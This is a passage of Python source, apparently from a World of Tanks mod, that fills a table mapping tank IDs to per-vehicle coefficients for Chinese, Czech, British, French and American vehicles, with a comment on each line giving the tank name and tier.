4913 china_Ch15_59_16 lvl:6 coeff:0.925 '22513147878': 8093209500, # 64817 china_Ch24_Type64 lvl:6 coeff:1.35 !!!!PREMIUM '1172946918' : 4676076600, # 3377 china_Ch16_WZ_131 lvl:7 coeff:0.78 '105936870' : 8392958000, # 305 china_Ch02_Type62 lvl:7 coeff:1.4 !!!!PREMIUM '1350781926' : 4043607265, # 3889 china_Ch17_WZ131_1_WZ132 lvl:8 coeff:0.6745 '21535055334': 8992455000, # 62001 china_Ch42_WalkerBulldog_M41D lvl:8 coeff:1.5 !!!!PREMIUM '1973204454' : 4016629900, # 5681 china_Ch28_WZ_132A lvl:9 coeff:0.67 '2062121958' : 3956680200, # 5937 china_Ch29_Type_62C_prot lvl:10 coeff:0.66 # mediumTank '1617534438' : 6654416700, # 4657 china_Ch21_T34 lvl:5 coeff:1.11 '1795369446' : 5449427730, # 5169 china_Ch20_Type58 lvl:6 coeff:0.909 '372689382' : 4676076600, # 1073 china_Ch04_T34_1 lvl:7 coeff:0.78 '22246395366': 9442077750, # 64049 china_Ch14_T34_3 lvl:8 coeff:1.575 !!!!PREMIUM '17019366' : 9442077750, # 49 china_Ch01_Type59 lvl:8 coeff:1.575 !!!!PREMIUM '194854374' : 9442077750, # 561 china_Ch01_Type59_Gold lvl:8 coeff:1.575 !!!!PREMIUM '22157477862': 8992455000, # 63793 china_Ch26_59_Patton lvl:8 coeff:1.5 !!!!PREMIUM '550524390' : 4244438760, # 1585 china_Ch05_T34_2 lvl:8 coeff:0.708 '639441894' : 4256428700, # 1841 china_Ch18_WZ-120 lvl:9 coeff:0.71 '22068560358': 4376328100, # 63537 china_Ch25_121_mod_1971B lvl:10 coeff:0.73 !!!!PREMIUM '1439699430' : 4376328100, # 4145 china_Ch19_121 lvl:10 coeff:0.73 # heavyTank '1261864422' : 5239603780, # 3633 china_Ch10_IS2 lvl:7 coeff:0.874 '22602065382': 9442077750, # 65073 china_Ch03_WZ_111_A lvl:8 coeff:1.575 !!!!PREMIUM '995111910' : 4688066540, # 2865 china_Ch11_110 lvl:8 coeff:0.782 '283771878' : 9442077750, # 817 china_Ch03_WZ-111 lvl:8 coeff:1.575 !!!!PREMIUM '22424230374': 9292203500, # 64561 china_Ch23_112 lvl:8 coeff:1.55 !!!!PREMIUM '728359398' : 4196479000, # 2097 china_Ch12_111_1_2_3 lvl:9 coeff:0.7 '1884286950' : 4640106780, # 5425 china_Ch22_113 lvl:10 coeff:0.774 '2151039462' : 4616126900, # 6193 china_Ch41_WZ_111_5A lvl:10 coeff:0.77 # AT-SPG '2239956966' : 6294718500, # 6449 china_Ch30_T-26G_FT lvl:2 coeff:1.05 '2328874470' : 5695221500, # 6705 china_Ch31_M3G_FT lvl:3 coeff:0.95 '2417791974' : 5395473000, # 6961 china_Ch32_SU-76G_FT lvl:4 coeff:0.9 '2506709478' : 5695221500, # 7217 china_Ch33_60G_FT lvl:5 coeff:0.95 '2595626982' : 5395473000, # 7473 china_Ch34_WZ131G_FT lvl:6 coeff:0.9 
'2684544486' : 4795976000, # 7729 china_Ch35_T-34-2G_FT lvl:7 coeff:0.8 '2773461990' : 4316378400, # 7985 china_Ch36_WZ111_1G_FT lvl:8 coeff:0.72 '21979642854': 8992455000, # 63281 china_Ch39_WZ120_1G_FT lvl:8 coeff:1.5 !!!!PREMIUM '2862379494' : 4196479000, # 8241 china_Ch37_WZ111G_FT lvl:9 coeff:0.7 '2951296998' : 3716881400, # 8497 china_Ch38_WZ113G_FT lvl:10 coeff:0.62 # heavyTank # '21801807846': None, #62769 china_Ch22_113P lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62769 #только КИТАЙ # '21712890342': None, #62513 china_Ch22_113_Beijing_Opera lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62513 #только КИТАЙ # '21623972838': None, #62257 china_Ch41_WZ_111_QL lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62257 #только КИТАЙ # AT-SPG # '21890725350': None, #63025 china_Ch40_WZ120G_FT lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=63025 #только КИТАЙ }) self.p__COEFFICIENTS.update({ # czech # lightTank '39248742' : 8392958000, # 113 czech_Cz06_Kolohousenka lvl:1 coeff:1.4 '128166246' : 6594467000, # 369 czech_Cz03_LT_vz35 lvl:2 coeff:1.1 '217083750' : 6294718500, # 625 czech_Cz10_LT_vz38 lvl:3 coeff:1.05 # mediumTank '306001254' : 5994970000, # 881 czech_Cz11_V_8_H lvl:4 coeff:1.0 '394918758' : 5994970000, # 1137 czech_Cz09_T_24 lvl:5 coeff:1.0 '17911667046': 7793461000, # 51569 czech_Cz01_Skoda_T40 lvl:6 coeff:1.3 !!!!PREMIUM '483836262' : 5395473000, # 1393 czech_Cz08_T_25 lvl:6 coeff:0.9 '572753766' : 4616126900, # 1649 czech_Cz05_T34_100 lvl:7 coeff:0.77 '18000584550': 8992455000, # 51825 czech_Cz13_T_27 lvl:8 coeff:1.5 !!!!PREMIUM '661671270' : 4316378400, # 1905 czech_Cz07_TVP_46 lvl:8 coeff:0.72 '750588774' : 4256428700, # 2161 czech_Cz02_TVP_T50 lvl:9 coeff:0.71 '839506278' : 4376328100, # 2417 czech_Cz04_T50_51 lvl:10 coeff:0.73 }) self.p__COEFFICIENTS.update({ # uk # lightTank '1806484134' : 7187969030, # 5201 uk_GB03_Cruiser_Mk_I lvl:2 coeff:1.199 '205969062' : 6594467000, # 593 uk_GB14_M2 lvl:2 coeff:1.1 '19056479910': 7791063012, # 54865 uk_GB76_Mk_VIC lvl:2 coeff:1.2996 !!!!PREMIUM '2695659174' : 6534517300, # 7761 uk_GB58_Cruiser_Mk_III lvl:2 coeff:1.09 '2606741670' : 6528522330, # 7505 uk_GB59_Cruiser_Mk_IV lvl:3 coeff:1.089 '2428906662' : 6528522330, # 6993 uk_GB69_Cruiser_Mk_II lvl:3 coeff:1.089 '472721574' : 5994970000, # 1361 uk_GB15_Stuart_I lvl:3 coeff:1.0 '2251071654' : 6456582690, # 6481 uk_GB60_Covenanter lvl:4 coeff:1.077 '1717566630' : 6150839220, # 4945 uk_GB04_Valentine lvl:4 coeff:1.026 '20745912486': 4675477103, # 59729 uk_GB104_GSR_3301_Setter lvl:7 coeff:0.7799 '20656994982': 4076579600, # 59473 uk_GB102_LHMTV lvl:8 coeff:0.68 '20301324966': 8992455000, # 58449 uk_GB101_FV1066_Senlac lvl:8 coeff:1.5 !!!!PREMIUM '20390242470': 4017229397, # 58705 uk_GB103_GSOR3301_AVR_FS lvl:9 coeff:0.6701 '20479159974': 3956680200, # 58961 uk_GB100_Manticore lvl:10 coeff:0.66 # mediumTank '28134054' : 9813765890, # 81 uk_GB01_Medium_Mark_I lvl:1 coeff:1.637 '117051558' : 7511697410, # 337 uk_GB05_Vickers_Medium_Mk_II lvl:2 coeff:1.253 '828391590' : 6528522330, # 2385 uk_GB06_Vickers_Medium_Mk_III lvl:3 coeff:1.089 '294886566' : 6150839220, # 849 uk_GB07_Matilda lvl:4 coeff:1.026 '18345139878': 7553662200, # 52817 uk_GB33_Sentinel_AC_I lvl:4 coeff:1.26 !!!!PREMIUM '561639078' : 5994970000, # 1617 uk_GB17_Grant_I lvl:4 coeff:1.0 '739474086' : 6336683290, # 2129 uk_GB20_Crusader lvl:5 coeff:1.057 '18611892390': 9172304100, # 53585 uk_GB68_Matilda_Black_Prince lvl:5 coeff:1.53 !!!!PREMIUM '4474009254' : 
5994970000, # 12881 uk_GB50_Sherman_III lvl:5 coeff:1.0 '19501067430': 7313863400, # 56145 uk_GB35_Sentinel_AC_IV lvl:6 coeff:1.22 !!!!PREMIUM '383804070' : 5587312040, # 1105 uk_GB21_Cromwell lvl:6 coeff:0.932 '19856737446': 7793461000, # 57169 uk_GB95_Ekins_Firefly_M4A4 lvl:6 coeff:1.3 !!!!PREMIUM '19412149926': 7493712500, # 55889 uk_GB85_Cromwell_Berlin lvl:6 coeff:1.25 !!!!PREMIUM '1272979110' : 5095724500, # 3665 uk_GB19_Sherman_Firefly lvl:6 coeff:0.85 '1895401638' : 4616126900, # 5457 uk_GB22_Comet lvl:7 coeff:0.77 '19767819942': 8992455000, # 56913 uk_GB94_Centurion_Mk5-1_RAAC lvl:8 coeff:1.5 !!!!PREMIUM '5363184294' : 9292203500, # 15441 uk_GB87_Chieftain_T95_turret lvl:8 coeff:1.55 !!!!PREMIUM '2073236646' : 4945850250, # 5969 uk_GB23_Centurion lvl:8 coeff:0.825 '19323232422': 9591952000, # 55633 uk_GB70_N_FV4202_105 lvl:8 coeff:1.6 !!!!PREMIUM '1984319142' : 4376328100, # 5713 uk_GB24_Centurion_Mk3 lvl:9 coeff:0.73 '2517824166' : 4376328100, # 7249 uk_GB86_Centurion_Action_X lvl:10 coeff:0.73 '5185349286' : 4376328100, # 14929 uk_GB70_FV4202_105 lvl:10 coeff:0.73 # heavyTank '18878644902': 8392958000, # 54353 uk_GB51_Excelsior lvl:5 coeff:1.4 !!!!PREMIUM '1006226598' : 6684391550, # 2897 uk_GB08_Churchill_I lvl:5 coeff:1.115 '18700809894': 8273058600, # 53841 uk_GB63_TOG_II lvl:6 coeff:1.38 !!!!PREMIUM '1628649126' : 5875070600, # 4689 uk_GB09_Churchill_VII lvl:6 coeff:0.98 '1095144102' : 5011794920, # 3153 uk_GB10_Black_Prince lvl:7 coeff:0.836 '19145397414': 7793461000, # 55121 uk_GB52_A45 lvl:7 coeff:1.3 !!!!PREMIUM '19678902438': 8992455000, # 56657 uk_GB93_Caernarvon_AX lvl:8 coeff:1.5 !!!!PREMIUM '1361896614' : 4945850250, # 3921 uk_GB11_Caernarvon lvl:8 coeff:0.825 '1539731622' : 4508217440, # 4433 uk_GB12_Conqueror lvl:9 coeff:0.752 '5452101798' : 4466252650, # 15697 uk_GB91_Super_Conqueror lvl:10 coeff:0.745 '2162154150' : 4466252650, # 6225 uk_GB13_FV215b lvl:10 coeff:0.745 !!!!PREMIUM '20123489958': 4376328100, # 57937 uk_GB98_T95_FV4201_Chieftain lvl:10 coeff:0.73 !!!!PREMIUM '5274266790' : 4376328100, # 15185 uk_GB84_Chieftain_Mk6 lvl:10 coeff:0.73 !!!!PREMIUM # AT-SPG '2873494182' : 6594467000, # 8273 uk_GB39_Universal_CarrierQF2 lvl:2 coeff:1.1 '2784576678' : 5395473000, # 8017 uk_GB42_Valentine_AT lvl:3 coeff:0.9 '3140246694' : 5665246650, # 9041 uk_GB57_Alecto lvl:4 coeff:0.945 '4651844262' : 5695221500, # 13393 uk_GB44_Archer lvl:5 coeff:0.95 '3051329190' : 5976985090, # 8785 uk_GB73_AT2 lvl:5 coeff:0.997 '3318081702' : 5395473000, # 9553 uk_GB74_AT8 lvl:6 coeff:0.9 '20034572454': 8572807100, # 57681 uk_GB96_Excalibur lvl:6 coeff:1.43 !!!!PREMIUM '5007514278' : 5395473000, # 14417 uk_GB45_Achilles_IIC lvl:6 coeff:0.9 '3406999206' : 6066909640, # 9809 uk_GB40_Gun_Carrier_Churchill lvl:6 coeff:1.012 '18789727398': 8273058600, # 54097 uk_GB71_AT_15A lvl:7 coeff:1.38 !!!!PREMIUM '3495916710' : 4766001150, # 10065 uk_GB75_AT7 lvl:7 coeff:0.795 '4918596774' : 4496227500, # 14161 uk_GB41_Challenger lvl:7 coeff:0.75 '20834829990': 8992455000, # 59985 uk_GB99_Turtle_Mk1 lvl:8 coeff:1.5 !!!!PREMIUM '2962411686' : 4340358280, # 8529 uk_GB72_AT15 lvl:8 coeff:0.724 '5096431782' : 4256428700, # 14673 uk_GB80_Charioteer lvl:8 coeff:0.71 '4562926758' : 3896730500, # 13137 uk_GB81_FV4004 lvl:9 coeff:0.65 '18256222374': 4286403550, # 52561 uk_GB32_Tortoise lvl:9 coeff:0.715 '3229164198' : 3495067510, # 9297 uk_GB48_FV215b_183 lvl:10 coeff:0.583 !!!!PREMIUM '4829679270' : 3596982000, # 13905 uk_GB83_FV4005 lvl:10 coeff:0.6 '5541019302' : 3495067510, # 15953 uk_GB92_FV217 lvl:10 
coeff:0.583 # SPG '3673751718' : 6894215500, # 10577 uk_GB25_Loyd_Gun_Carriage lvl:2 coeff:1.15 '18967562406': 10850895700, # 54609 uk_GB78_Sexton_I lvl:3 coeff:1.81 !!!!PREMIUM '1184061606' : 6534517300, # 3409 uk_GB27_Sexton lvl:3 coeff:1.09 '3762669222' : 6294718500, # 10833 uk_GB26_Birch_Gun lvl:4 coeff:1.05 '3851586726' : 6594467000, # 11089 uk_GB28_Bishop lvl:5 coeff:1.1 '4118339238' : 5994970000, # 11857 uk_GB77_FV304 lvl:6 coeff:1.0 '3940504230' : 4795976000, # 11345 uk_GB29_Crusader_5inch lvl:7 coeff:0.8 '4207256742' : 4496227500, # 12113 uk_GB79_FV206 lvl:8 coeff:0.75 '4029421734' : 4496227500, # 11601 uk_GB30_FV3805 lvl:9 coeff:0.75 '4296174246' : 4616126900, # 12369 uk_GB31_Conqueror_Gun lvl:10 coeff:0.77 # heavyTank # '20568077478': None, #59217 uk_GB105_Black_Prince_2019 lvl:6 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=59217 #A43 BP prototype, Этого танка нет ни у кого # '19589984934': None, #56401 uk_GB88_T95_Chieftain_turret lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=56401 #T95/Chieftain, Этого танка нет ни у кого }) self.p__COEFFICIENTS.update({ # france # lightTank '200411718' : 9771801100, # 577 france_F01_RenaultFT lvl:1 coeff:1.63 '15049634886': 7193964000, # 43329 france_F111_AM39_Gendron_Somua lvl:2 coeff:1.2 !!!!PREMIUM '5268709446' : 6594467000, # 15169 france_F50_FCM36_20t lvl:2 coeff:1.1 '556081734' : 7649581720, # 1601 france_F02_D1 lvl:2 coeff:1.276 '5535461958' : 6594467000, # 15937 france_F49_RenaultR35 lvl:2 coeff:1.1 '467164230' : 7307868430, # 1345 france_F12_Hotchkiss_H35 lvl:2 coeff:1.219 '15227469894': 6534517300, # 43841 france_F42_AMR_35 lvl:2 coeff:1.09 !!!!PREMIUM '2067679302' : 6672401610, # 5953 france_F13_AMX38 lvl:3 coeff:1.113 '1000669254' : 6270738620, # 2881 france_F14_AMX40 lvl:4 coeff:1.046 '4913039430' : 5994970000, # 14145 france_F62_ELC_AMX lvl:5 coeff:1.0 '6246801990' : 5215623900, # 17985 france_F109_AMD_Panhard_178B lvl:6 coeff:0.87 '2245514310' : 5233608810, # 6465 france_F15_AMX_12t lvl:6 coeff:0.873 '1800926790' : 4939855280, # 5185 france_F16_AMX_13_75 lvl:7 coeff:0.824 '6335719494' : 4675477103, # 18241 france_F107_Hotchkiss_EBR lvl:7 coeff:0.7799 '21985200198': 8391759006, # 63297 france_F69_AMX13_57_100_GrandFinal lvl:7 coeff:1.3998 !!!!PREMIUM '22163035206': 8392958000, # 63809 france_F69_AMX13_57_100 lvl:7 coeff:1.4 !!!!PREMIUM '15138552390': 8992455000, # 43585 france_F106_Panhard_EBR_75_Mle1954 lvl:8 coeff:1.5 !!!!PREMIUM '6068966982' : 4076579600, # 17473 france_F87_Batignolles-Chatillon_12t lvl:8 coeff:0.68 '6424636998' : 4076579600, # 18497 france_F110_Lynx_6x6 lvl:8 coeff:0.68 '21362777670': 8992455000, # 61505 france_F97_ELC_EVEN_90 lvl:8 coeff:1.5 !!!!PREMIUM '1712009286' : 4016629900, # 4929 france_F17_AMX_13_90 lvl:9 coeff:0.67 '6513554502' : 4017229397, # 18753 france_F100_Panhard_EBR_90 lvl:9 coeff:0.6701 '5980049478' : 3956680200, # 17217 france_F88_AMX_13_105 lvl:10 coeff:0.66 '6602472006' : 3956680200, # 19009 france_F108_Panhard_EBR_105 lvl:10 coeff:0.66 # mediumTank '4557369414' : 5994970000, # 13121 france_F44_Somua_S35 lvl:3 coeff:1.0 '111494214' : 6144844250, # 321 france_F03_D2 lvl:3 coeff:1.025 '5179791942' : 5994970000, # 14913 france_F70_SARL42 lvl:4 coeff:1.0 '1534174278' : 6294718500, # 4417 france_F11_Renault_G1R lvl:5 coeff:1.05 '21096025158': 7493712500, # 60737 france_F113_Bretagne_Panther lvl:6 coeff:1.25 !!!!PREMIUM '22074117702': 8992455000, # 63553 france_F68_AMX_Chasseur_de_char_46 lvl:8 coeff:1.5 !!!!PREMIUM '21896282694': 8992455000, # 63041 
france_F73_M4A1_Revalorise lvl:8 coeff:1.5 !!!!PREMIUM '21718447686': 9591952000, # 62529 france_F19_Lorraine40t lvl:8 coeff:1.6 !!!!PREMIUM '1978761798' : 4897890490, # 5697 france_F75_Char_de_25t lvl:9 coeff:0.817 '5446544454' : 4496227500, # 15681 france_F71_AMX_30_prototype lvl:9 coeff:0.75 '5357626950' : 4376328100, # 15425 france_F72_AMX_30 lvl:10 coeff:0.73 '1267421766' : 4496227500, # 3649 france_F18_Bat_Chatillon25t lvl:10 coeff:0.75 # heavyTank '378246726' : 6474567600, # 1089 france_F04_B1 lvl:4 coeff:1.08 '2334431814' : 6474567600, # 6721 france_F05_BDR_G1B lvl:5 coeff:1.08 '911751750' : 5431442820, # 2625 france_F06_ARL_44 lvl:6 coeff:0.906 '2423349318' : 4766001150, # 6977 france_F07_AMX_M4_1945 lvl:7 coeff:0.795 '21629530182': 8992455000, # 62273 france_F84_Somua_SM lvl:8 coeff:1.5 !!!!PREMIUM '5713296966' : 4795976000, # 16449 france_F81_Char_de_65t lvl:8 coeff:0.8 '21540612678': 9591952000, # 62017 france_F74_AMX_M4_1949_Liberte lvl:8 coeff:1.6 !!!!PREMIUM '22251952710': 8662731650, # 64065 france_F65_FCM_50t lvl:8 coeff:1.445 !!!!PREMIUM '1089586758' : 4754011210, # 3137 france_F08_AMX_50_100 lvl:8 coeff:0.793 '21807365190': 9591952000, # 62785 france_F74_AMX_M4_1949 lvl:8 coeff:1.6 !!!!PREMIUM '1356339270' : 4208468940, # 3905 france_F09_AMX_50_120 lvl:9 coeff:0.702 '5802214470' : 4316378400, # 16705 france_F83_AMX_M4_Mle1949_Bis lvl:9 coeff:0.72 '2156596806' : 4496227500, # 6209 france_F10_AMX_50B lvl:10 coeff:0.75 '5891131974' : 4256428700, # 16961 france_F82_AMX_M4_Mle1949_Ter lvl:10 coeff:0.71 # AT-SPG '2690101830' : 5935020300, # 7745 france_F30_RenaultFT_AC lvl:2 coeff:0.99 '2867936838' : 5503382460, # 8257 france_F52_RenaultUE57 lvl:3 coeff:0.918 '822834246' : 7793461000, # 2369 france_F27_FCM_36Pak40 lvl:3 coeff:1.3 !!!!PREMIUM '3401441862' : 5809125930, # 9793 france_F32_Somua_Sau_40 lvl:4 coeff:0.969 '21273860166': 8692706500, # 61249 france_F112_M10_RBFM lvl:5 coeff:1.45 !!!!PREMIUM '3490359366' : 5437437790, # 10049 france_F33_S_35CA lvl:5 coeff:0.907 '4023864390' : 5467412640, # 11585 france_F34_ARL_V39 lvl:6 coeff:0.912 '3757111878' : 4718041390, # 10817 france_F35_AMX_AC_Mle1946 lvl:7 coeff:0.787 '4201699398' : 4256428700, # 12097 france_F36_AMX_AC_Mle1948 lvl:8 coeff:0.71 '21451695174': 8992455000, # 61761 france_F89_Canon_dassaut_de_105 lvl:8 coeff:1.5 !!!!PREMIUM '3846029382' : 4196479000, # 11073 france_F37_AMX50_Foch lvl:9 coeff:0.7 '4824121926' : 3177334100, # 13889 france_F64_AMX_50Fosh_155 lvl:10 coeff:0.53 !!!!PREMIUM '6157884486' : 3176734603, # 17729 france_F64_AMX_50Fosh_B lvl:10 coeff:0.5299 # SPG '289329222' : 6894215500, # 833 france_F20_RenaultBS lvl:2 coeff:1.15 '1178504262' : 6474567600, # 3393 france_F21_Lorraine39_L_AM lvl:3 coeff:1.08 '5090874438' : 6510537420, # 14657 france_F66_AMX_Ob_Am105 lvl:4 coeff:1.086 '1445256774' : 6618446880, # 4161 france_F22_AMX_105AM lvl:5 coeff:1.104 '733916742' : 8093209500, # 2113 france_F28_105_leFH18B2 lvl:5 coeff:1.35 !!!!PREMIUM '1623091782' : 6726356340, # 4673 france_F23_AMX_13F3AM lvl:6 coeff:1.122 '2512266822' : 5395473000, # 7233 france_F24_Lorraine155_50 lvl:7 coeff:0.9 '2601184326' : 4256428700, # 7489 france_F25_Lorraine155_51 lvl:8 coeff:0.71 '5001956934' : 3836780800, # 14401 france_F67_Bat_Chatillon155_55 lvl:9 coeff:0.64 '4112781894' : 4676076600, # 11841 france_F38_Bat_Chatillon155_58 lvl:10 coeff:0.78 # mediumTank # '21184942662': None, #60993 france_F85_M4A1_FL10 lvl:6 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60993 #M4A1 FL 10, в разработке # '20918190150': None, #60225 
france_F116_Bat_Chatillon_Bourrasque lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60225 #в разработке # '21007107654': None, #60481 france_F114_Projet_4_1 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=60481 #Char Futur 4, в разработке }) self.p__COEFFICIENTS.update({ # usa # lightTank '14238262662': 8992455000, # 40993 usa_A01_T1_Cunningham_bot lvl:1 coeff:1.5 '189297030' : 8183134050, # 545 usa_A01_T1_Cunningham lvl:1 coeff:1.365 '17883880326': 7613611900, # 51489 usa_A19_T2_lt lvl:2 coeff:1.27 !!!!PREMIUM '18595220358': 8692706500, # 53537 usa_A74_T1_E6 lvl:2 coeff:1.45 !!!!PREMIUM '14505015174': 8392958000, # 41761 usa_A22_M5_Stuart_bootcamp lvl:2 coeff:1.4 '19128725382': 7793461000, # 55073 usa_A93_T7_Combat_Car lvl:2 coeff:1.3 !!!!PREMIUM '14416097670': 8992455000, # 41505 usa_A03_M3_Stuart_bootcamp lvl:2 coeff:1.5 '633884550' : 6606456940, # 1825 usa_A02_M2_lt lvl:2 coeff:1.102 '100379526' : 6414617900, # 289 usa_A03_M3_Stuart lvl:3 coeff:1.07 '18061715334': 7553662200, # 52001 usa_A33_MTLS-1G14 lvl:3 coeff:1.26 !!!!PREMIUM '18328467846': 9412102900, # 52769 usa_A43_M22_Locust lvl:3 coeff:1.57 !!!!PREMIUM '1789812102' : 6474567600, # 5153 usa_A22_M5_Stuart lvl:4 coeff:1.08 '3390327174' : 5994970000, # 9761 usa_A34_M24_Chaffee lvl:5 coeff:1.0 '1878729606' : 6594467000, # 5409 usa_A23_M7_med lvl:5 coeff:1.1 '5791099782' : 5095724500, # 16673 usa_A94_T37 lvl:6 coeff:0.85 '5257594758' : 5275573600, # 15137 usa_A71_T21 lvl:6 coeff:0.88 '5435429766' : 4676076600, # 15649 usa_A103_T71E1 lvl:7 coeff:0.78 '6858109830' : 4676076600, # 19745 usa_A112_T71E2R lvl:7 coeff:0.78 '6235687302' : 4076579600, # 17953 usa_A97_M41_Bulldog lvl:8 coeff:0.68 '20106817926': 8992455000, # 57889 usa_A99_T92_LT lvl:8 coeff:1.5 !!!!PREMIUM '6324604806' : 4016629900, # 18209 usa_A100_T49 lvl:9 coeff:0.67 '6769192326' : 3956680200, # 19489 usa_A116_XM551 lvl:10 coeff:0.66 # mediumTank '1967647110' : 6756331190, # 5665 usa_A24_T2_med lvl:2 coeff:1.127 '14327180166': 8392958000, # 41249 usa_A24_T2_med_bot lvl:2 coeff:1.4 '1700894598' : 6258748680, # 4897 usa_A25_M2_med lvl:3 coeff:1.044 '1078472070' : 6648421730, # 3105 usa_A04_M3_Grant lvl:4 coeff:1.109 '18150632838': 9532002300, # 52257 usa_A44_M4A2E4 lvl:5 coeff:1.59 !!!!PREMIUM '4368419718' : 8392958000, # 12577 usa_A78_M4_Improved lvl:5 coeff:1.4 !!!!PREMIUM '367132038' : 5803130960, # 1057 usa_A05_M4_Sherman lvl:5 coeff:0.968 '17972797830': 9292203500, # 51745 usa_A62_Ram-II lvl:5 coeff:1.55 !!!!PREMIUM '20729240454': 7313863400, # 59681 usa_A118_M4_Thunderbolt lvl:6 coeff:1.22 !!!!PREMIUM '456049542' : 5203633960, # 1313 usa_A06_M4A3E8_Sherman lvl:6 coeff:0.868 '19484395398': 7313863400, # 56097 usa_A104_M4A3E8A lvl:6 coeff:1.22 !!!!PREMIUM '3479244678' : 5119704380, # 10017 usa_A36_Sherman_Jumbo lvl:6 coeff:0.854 '4101667206' : 7793461000, # 11809 usa_A86_T23E3 lvl:7 coeff:1.3 !!!!PREMIUM '20818157958': 7793461000, # 59937 usa_A121_M26_Cologne lvl:7 coeff:1.3 !!!!PREMIUM '544967046' : 4652096720, # 1569 usa_A07_T20 lvl:7 coeff:0.776 '811719558' : 9591952000, # 2337 usa_A08_T23 lvl:8 coeff:1.6 '19928982918': 8992455000, # 57377 usa_A111_T25_Pilot lvl:8 coeff:1.5 !!!!PREMIUM '5079759750' : 4016629900, # 14625 usa_A90_T69 lvl:8 coeff:0.67 '19840065414': 9442077750, # 57121 usa_A63_M46_Patton_KR lvl:8 coeff:1.575 !!!!PREMIUM '4635172230' : 9442077750, # 13345 usa_A80_T26_E4_SuperPershing lvl:8 coeff:1.575 !!!!PREMIUM '18684137862': 8992455000, # 53793 usa_A81_T95_E2 lvl:8 coeff:1.5 !!!!PREMIUM '2056564614' : 4244438760, # 5921 
usa_A35_Pershing lvl:8 coeff:0.708 '21618415494': 8992455000, # 62241 usa_A127_TL_1_LPC lvl:8 coeff:1.5 !!!!PREMIUM '5346512262' : 4196479000, # 15393 usa_A89_T54E1 lvl:9 coeff:0.7 '3123574662' : 4502222470, # 8993 usa_A63_M46_Patton lvl:9 coeff:0.751 '5524347270' : 4376328100, # 15905 usa_A92_M60 lvl:10 coeff:0.73 !!!!PREMIUM '4901924742' : 4400307980, # 14113 usa_A120_M48A5 lvl:10 coeff:0.734 # heavyTank '1167389574' : 6558497180, # 3361 usa_A09_T1_hvy lvl:5 coeff:1.094 '11462022' : 9711851400, # 33 usa_A21_T14 lvl:5 coeff:1.62 !!!!PREMIUM '278214534' : 5587312040, # 801 usa_A10_M6 lvl:6 coeff:0.932 '1345224582' : 5011794920, # 3873 usa_A11_T29 lvl:7 coeff:0.836 '18239550342': 10011599900, # 52513 usa_A45_M6A2E1 lvl:8 coeff:1.67 !!!!PREMIUM '20373570438': 8992455000, # 58657 usa_A115_Chrysler_K_GF lvl:8 coeff:1.5 !!!!PREMIUM '1523059590' : 4963835160, # 4385 usa_A12_T32 lvl:8 coeff:0.828 '20551405446': 9442077750, # 59169 usa_A117_T26E5_Patriot lvl:8 coeff:1.575 !!!!PREMIUM '989554566' : 9442077750, # 2849 usa_A13_T34_hvy lvl:8 coeff:1.575 !!!!PREMIUM '20462487942': 9442077750, # 58913 usa_A117_T26E5 lvl:8 coeff:1.575 !!!!PREMIUM '3301409670' : 4406302950, # 9505 usa_A66_M103 lvl:9 coeff:0.735 '21440580486': 4675477103, # 61729 usa_A125_AEP_1 lvl:9 coeff:0.7799 !!!!PREMIUM '3745997190' : 4406302950, # 10785 usa_A69_T110E5 lvl:10 coeff:0.735 '5168677254' : 4376328100, # 14881 usa_A67_T57_58 lvl:10 coeff:0.73 '21529497990': 8992455000, # 61985 usa_A124_T54E2 lvl:8 coeff:1.5 !!!!PREMIUM https://premomer.org/tank.php?id=61985 #M54 Renegade # AT-SPG '2145482118' : 6294718500, # 6177 usa_A46_T3 lvl:2 coeff:1.05 '2234399622' : 5695221500, # 6433 usa_A109_T56_GMC lvl:3 coeff:0.95 '2678987142' : 5005799950, # 7713 usa_A29_T40 lvl:4 coeff:0.835 '3568162182' : 5389478030, # 10273 usa_A57_M8A1 lvl:4 coeff:0.899 '3657079686' : 5779151080, # 10529 usa_A58_T67 lvl:5 coeff:0.964 '2412234630' : 5851090720, # 6945 usa_A30_M10_Wolverine lvl:5 coeff:0.976 '4012749702' : 4783986060, # 11553 usa_A41_M18_Hellcat lvl:6 coeff:0.798 '2501152134' : 5161669170, # 7201 usa_A31_M36_Slagger lvl:6 coeff:0.861 '21262745478': 7792262006, # 61217 usa_A123_T78 lvl:6 coeff:1.2998 !!!!PREMIUM '19573312902': 8093209500, # 56353 usa_A101_M56 lvl:7 coeff:1.35 !!!!PREMIUM '19662230406': 8392958000, # 56609 usa_A102_T28_concept lvl:7 coeff:1.4 !!!!PREMIUM '3212492166' : 4897890490, # 9249 usa_A64_T25_AT lvl:7 coeff:0.817 '3834914694' : 4388318040, # 11041 usa_A72_T25_2 lvl:7 coeff:0.732 '21707332998': 4783386563, # 62497 usa_A130_Super_Hellcat lvl:7 coeff:0.7979 !!!!PREMIUM '20995992966': 8992455000, # 60449 usa_A122_TS-5 lvl:8 coeff:1.5 !!!!PREMIUM '2856822150' : 4340358280, # 8225 usa_A39_T28 lvl:8 coeff:0.724 '3923832198' : 4262423670, # 11297 usa_A68_T28_Prototype lvl:8 coeff:0.711 '3034657158' : 4136529300, # 8737 usa_A40_T95 lvl:9 coeff:0.69 '900637062' : 4322373370, # 2593 usa_A14_T30 lvl:9 coeff:0.721 '4813007238' : 3788821040, # 13857 usa_A85_T110E3 lvl:10 coeff:0.632 '4546254726' : 3746856250, # 13089 usa_A83_T110E4 lvl:10 coeff:0.625 # SPG '722802054' : 7193964000, # 2081 usa_A107_T1_HMC lvl:2 coeff:1.2 '1256307078' : 6594467000, # 3617 usa_A16_M7_Priest lvl:3 coeff:1.1 '6413522310' : 6594467000, # 18465 usa_A108_T18_HMC lvl:3 coeff:1.1 '1611977094' : 6474567600, # 4641 usa_A17_M37 lvl:4 coeff:1.08 '6502439814' : 6594467000, # 18721 usa_A27_T82 lvl:4 coeff:1.1 '1434142086' : 7014114900, # 4129 usa_A18_M41 lvl:5 coeff:1.17 '5702182278' : 6114869400, # 16417 usa_A87_M44 lvl:6 coeff:1.02 '2767904646' : 